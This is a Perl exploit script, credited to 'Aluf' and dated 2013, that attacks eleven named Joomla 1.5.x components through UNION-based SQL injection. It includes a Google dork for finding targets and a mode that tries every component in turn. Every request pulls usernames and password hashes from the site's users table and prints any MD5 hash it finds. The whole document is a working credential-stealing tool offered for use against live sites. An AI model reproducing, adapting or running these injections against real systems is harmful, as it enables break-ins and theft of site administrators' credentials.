Multi Component SQL Injector

#Exploit Title: Joomla 1.5.x Multi Component SQL Injector ()
#Exploit Author: Aluf
#Date: 28/01/2013
#Google Dork: inurl:"com_..."
#!/usr/bin/perl
use IO::Socket::INET;
use LWP::UserAgent;
system("clear");
print "---------------------------------------------\n";
print "  Joomla 1.5.x Multi Component SQL Injector  \n";
print "          Created by Aluf            \n";
print "---------------------------------------------\n\n";
$target = $ARGV[0];
$component = $ARGV[1];
if($target eq '' || $component eq '')
{
print "Usage: ./exploit.pl <target> <component> \n";
print "-----------------------------------\n";
print " Available components :        \n";
print " 1- com_alfurqan15x            \n";
print " 2- com_jobprofile             \n";
print " 3- com_question               \n";
print " 4- com_joomloc                \n";
print " 5- com_joomlub               \n";
print " 6- com_manager                \n";
print " 7- com_iproperty              \n";
print " 8- com_jooproperty               \n";
print " 9- com_digifolio                 \n";
print " 10- com_rdautos                   \n";
print " 11- com_ownbiblio                \n";
print " 12- try to exploit all components \n";
print "-----------------------------------\n";
print " Example: ./exploit.pl http://www.site.com/spa/ 1 \n\n";
exit(1);
}

open(FILE, "> contents11.txt");

if($target !~ /http:\/\//)
{
$target = "http://$target";
}

sleep 1.5;
$agent = LWP::UserAgent->new();
$agent->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1');
if($component == 1)
{
$host = $target . "/index.php?option=com_alfurqan15x&action=viewayat&surano=-999.9+UNION+ALL+SELECT+1,concat_ws(0x3a,username,0x3a,password)kaMtiEz,3,4,5+from+jos_users--";
print " . . Exploiting com_alfurqan15x on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password \n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}
}

if($component == 2)
{
$host = $target . "index.php?option=com_jobprofile&amp;Itemid=61&amp;task=profilesview&amp;id=-1+union+all+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9+from+jos_users--";
print " . . Exploiting com_jobprofile on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}
}

if($component == 3)
{
$host = $target . "/index.php/?option=com_question&amp;catID=21' and+1=0 union all select  # | 1,2,3,4,5,6,concat(username,0x3a,password),8,9 from jos_users--%20";
print " . . Exploiting com_question on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}
}

if($component == 4)
{
$host = $target . "/index.php?option=com_joomloc&amp;controller=loc&amp;view=loc&amp;layout=loc&amp;task=edit&amp;cid[]=1&amp;id=1 and 1=2 union select 1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56+from+jos_users";
print " . . Exploiting com_joomloc on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}
}

if($component == 5)
{
print " . . Exploiting com_joomlub on target $target . . \n\n";
sleep 1;
print " . . Trying different types of injection for this component . . wait please . . \n\n";
$host = $target . "/index.php?option=com_joomlub&amp;controller=auction&amp;view=auction&amp;task=edit&amp;aid=-2%20union%20all%20select%201,2,3,concat(0x3a,username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+jos_users";
$host1 = $target . "/index.php?option=com_joomlub&amp;controller=auction&amp;view=auction&amp;task=edit&amp;aid=-2%20union%20all%20select%201,2,3,concat_ws(0x3a,username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+jos_users";
$host2 = $target . "/index.php?option=com_joomlub&amp;controller=auction&amp;view=auction&amp;task=edit&amp;aid=-2%20union%20all%20select%201,2,3,concat_ws(0x3a,username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+jos_users--%20";
$host3 = $target . "/index.php?option=com_joomlub&amp;controller=auction&amp;view=auction&amp;task=edit&amp;aid=2'%20and+1=0%20union%20all%20select%20#%20|%201,2,3,concat_ws(0x3a,username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+jos_users--%20";
$host4= $target . "/index.php?option=com_joomlub&amp;controller=auction&amp;view=auction&amp;task=edit&amp;aid=-2%20UNION%20ALL%20SELECT%201,2,3,concat(0x3a,username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+jos_users";

@hosts = ($host,$host1,$host2,$host3,$host4);
foreach $hos(@hosts)
{
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$hos));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "Password found --> $password :) . \n\n";
sleep 1;
}
else
{
print "Password not found :( . \n\n";
sleep 1;
}
}
}

if($component == 6)
{
$host = $target . "/index.php?option=com_manager&view=flight&Itemid=-999999/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,group_concat(username,char(58),password)v3n0m/**/from/**/jos_users--";
print " . . Exploiting com_manager on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}
}

if($component == 7)
{
$host = $target . "/index.php?option=com_iproperty&view=agentproperties&id=-999999/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,group_concat(username,char(58),password)v3n0m/**/from/**/jos_users--";
print " . . Exploiting com_iproperty on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}
}

if($component == 8)
{
$host = $target . "/index.php?option=com_jooproperty&view=booking&layout=modal&product_id=1%20and%201=0%20union%20select%201,(select group_concat(username,0x3D,password)%20from%20dy978_users)+--+";
print " . . Exploiting com_jooproperty on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}
}

if($component == 9)
{
$host = $target. "/index.php?option=com_digifolio&view=project&id=10/**/and/**/1=2/**/union/**/select/**/1,2,group_concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17/**/from/**/jos_users--";
print " . . Exploiting com_digifolio on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}
}

if($component == 10)
{
$host = $target . "/index.php?option=com_rdautos&view=category&id=-1+union+select+concat(username,char(58),password)+from+jos_users--&Itemid=54";
print " . . Exploiting com_rdautos on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}
}

if($component == 11)
{
$host = $target. "/index.php?option=com_ownbiblio&view=catalogue&catid=-1+union+all+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--";
print " . . Exploiting com_ownbiblio on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}
}

if($component == 12)
{
print " . . Trying to exploit all available components . . \n\n";
sleep 2;
$host = $target . "/index.php?option=com_alfurqan15x&action=viewayat&surano=-999.9+UNION+ALL+SELECT+1,concat_ws(0x3a,username,0x3a,password)kaMtiEz,3,4,5+from+jos_users--";
print " . . Exploiting com_alfurqan15x on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password \n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}

sleep 2;

$host = $target . "index.php?option=com_jobprofile&amp;Itemid=61&amp;task=profilesview&amp;id=-1+union+all+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9+from+jos_users--";
print " . . Exploiting com_jobprofile on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}

sleep 2;

$host = $target . "/index.php/?option=com_question&amp;catID=21' and+1=0 union all select  # | 1,2,3,4,5,6,concat(username,0x3a,password),8,9 from jos_users--%20";
print " . . Exploiting com_question on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}

sleep 2;

$host = $target . "/index.php?option=com_joomloc&amp;controller=loc&amp;view=loc&amp;layout=loc&amp;task=edit&amp;cid[]=1&amp;id=1 and 1=2 union select 1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56+from+jos_users";
print " . . Exploiting com_joomloc on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}

sleep 2;

print " . . Exploiting com_joomlub on target $target . . \n\n";
sleep 1;
print " . . Trying different types of injection for this component . . wait please . . \n\n";
$host = $target . "/index.php?option=com_joomlub&amp;controller=auction&amp;view=auction&amp;task=edit&amp;aid=-2%20union%20all%20select%201,2,3,concat(0x3a,username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+jos_users";
$host1 = $target . "/index.php?option=com_joomlub&amp;controller=auction&amp;view=auction&amp;task=edit&amp;aid=-2%20union%20all%20select%201,2,3,concat_ws(0x3a,username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+jos_users";
$host2 = $target . "/index.php?option=com_joomlub&amp;controller=auction&amp;view=auction&amp;task=edit&amp;aid=-2%20union%20all%20select%201,2,3,concat_ws(0x3a,username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+jos_users--%20";
$host3 = $target . "/index.php?option=com_joomlub&amp;controller=auction&amp;view=auction&amp;task=edit&amp;aid=2'%20and+1=0%20union%20all%20select%20#%20|%201,2,3,concat_ws(0x3a,username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+jos_users--%20";
$host4= $target . "/index.php?option=com_joomlub&amp;controller=auction&amp;view=auction&amp;task=edit&amp;aid=-2%20UNION%20ALL%20SELECT%201,2,3,concat(0x3a,username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+jos_users";

@hosts = ($host,$host1,$host2,$host3,$host4);
foreach $hos(@hosts)
{
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$hos));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "Password found --> $password :) . \n\n";
sleep 1;
}
else
{
print "Password not found :( . \n\n";
}

sleep 2;

$host = $target . "/index.php?option=com_manager&view=flight&Itemid=-999999/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,group_concat(username,char(58),password)v3n0m/**/from/**/jos_users--";
print " . . Exploiting com_manager on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}
}

sleep 2;

$host = $target . "/index.php?option=com_iproperty&view=agentproperties&id=-999999/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,group_concat(username,char(58),password)v3n0m/**/from/**/jos_users--";
print " . . Exploiting com_iproperty on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}

sleep 2;

$host = $target . "/index.php?option=com_jooproperty&view=booking&layout=modal&product_id=1%20and%201=0%20union%20select%201,(select group_concat(username,0x3D,password)%20from%20dy978_users)+--+";
print " . . Exploiting com_jooproperty on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}

sleep 2;

$host = $target. "/index.php?option=com_digifolio&view=project&id=10/**/and/**/1=2/**/union/**/select/**/1,2,group_concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17/**/from/**/jos_users--";
print " . . Exploiting com_digifolio on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}

sleep 2;

$host = $target . "/index.php?option=com_rdautos&view=category&id=-1+union+select+concat(username,char(58),password)+from+jos_users--&Itemid=54";
print " . . Exploiting com_rdautos on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}

sleep 2;

$host = $target. "/index.php?option=com_ownbiblio&view=catalogue&catid=-1+union+all+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--";
print " . . Exploiting com_ownbiblio on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}

sleep 2;

print "[+] Attack finished. \n\n";

}